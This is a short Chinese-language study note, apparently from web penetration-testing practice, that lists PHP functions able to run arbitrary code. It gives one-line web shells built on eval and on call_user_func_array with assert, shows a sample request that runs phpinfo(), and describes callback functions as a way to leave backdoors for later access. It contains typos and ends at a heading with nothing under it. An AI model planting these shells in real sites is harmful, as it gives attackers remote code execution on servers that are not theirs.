哪些是可以执行代码执行:php代码。
eval
如:eval:<?php eval($_post['key']);
eval:php中不被叫做函数叫动态执行命令
assert:执行函数
call_user_func_array
<?php call_user_func_array('assert',array($_REQUEST['shu']));
传入xxs-labs/test.php?shu=phpinfo();
回调回门(用于留后门的,方便下次渗透):
回调后门的闭住:call_user_func()
call_user_func_array()
call_user_func
array_filter
arrya_map
uasort、uksort、array_walk、array_walk_recursive
preg_replace
当匹配的格式有**|e**的时候匹配到的字符会投到eval里面执行
哪些是可以执行命令:服务器的命令。